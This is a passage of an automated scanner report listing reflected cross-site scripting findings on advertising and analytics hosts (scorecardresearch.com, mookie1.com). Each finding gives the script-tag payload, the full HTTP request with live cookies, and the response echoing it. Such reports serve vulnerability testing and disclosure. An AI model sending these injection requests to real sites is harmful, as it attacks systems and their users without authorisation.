Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:37 GMT
Date: Mon, 14 Feb 2011 01:26:37 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!", c4:".id!ecbe3<script>alert(1)</script>19cfb851d89", c5:"57892644", c6:"", c10:"", c15:"", c16:"", r:""});

1.93. http://b.scorecardresearch.com/beacon.js [c5 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload d5698<script>alert(1)</script>41ad9abe9a7 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=57892644d5698<script>alert(1)</script>41ad9abe9a7&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:37 GMT
Date: Mon, 14 Feb 2011 01:26:37 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
score;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!", c4:".id!", c5:"57892644d5698<script>alert(1)</script>41ad9abe9a7", c6:"", c10:"", c15:"", c16:"", r:""});

1.94. http://b.scorecardresearch.com/beacon.js [c6 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload cd70e<script>alert(1)</script>b6f76d922d1 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=57892644&c6=cd70e<script>alert(1)</script>b6f76d922d1& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:38 GMT
Date: Mon, 14 Feb 2011 01:26:38 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
or(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!", c4:".id!", c5:"57892644", c6:"cd70e<script>alert(1)</script>b6f76d922d1", c10:"", c15:"", c16:"", r:""});

1.95. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37cdc"><script>alert(1)</script>42f29418bd4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB337cdc"><script>alert(1)</script>42f29418bd4/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB337cdc"><script>alert(1)</script>42f29418bd4/FarmersBranding/2011Q1/BTRT1/728/115666934/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.96. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e176c"><script>alert(1)</script>ba946806cc4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBrandinge176c"><script>alert(1)</script>ba946806cc4/2011Q1/BTRT1/728/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2645525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBrandinge176c"><script>alert(1)</script>ba946806cc4/2011Q1/BTRT1/728/440039318/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.97. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12411"><script>alert(1)</script>948b5d9dd28 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q112411"><script>alert(1)</script>948b5d9dd28/BTRT1/728/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q112411"><script>alert(1)</script>948b5d9dd28/BTRT1/728/1632556584/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.98. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b804e"><script>alert(1)</script>4cb874026ca was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1b804e"><script>alert(1)</script>4cb874026ca/728/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT1b804e"><script>alert(1)</script>4cb874026ca/728/844783005/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.99. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 168c3"><script>alert(1)</script>e6ff1b42792 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728168c3"><script>alert(1)</script>e6ff1b42792/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728168c3"><script>alert(1)</script>e6ff1b42792/303112085/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.100. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f787"><script>alert(1)</script>32af85f766d was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x904f787"><script>alert(1)</script>32af85f766d HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2645525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/2008971942/x904f787"><script>alert(1)</script>32af85f766d/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.101. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53250"><script>alert(1)</script>f2c52472042 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB353250"><script>alert(1)</script>f2c52472042/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB353250"><script>alert(1)</script>f2c52472042/ATTW/1H_11Q1/RON1HCPC/300/782092599/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.102. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 106f9"><script>alert(1)</script>f534803ea84 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW106f9"><script>alert(1)</script>f534803ea84/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:18 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW106f9"><script>alert(1)</script>f534803ea84/1H_11Q1/RON1HCPC/300/381312021/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.103. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e043d"><script>alert(1)</script>d97c917261a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW/1H_11Q1e043d"><script>alert(1)</script>d97c917261a/RON1HCPC/300/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:20 GMT
Server: Apache/2.0.52 (Red Hat)
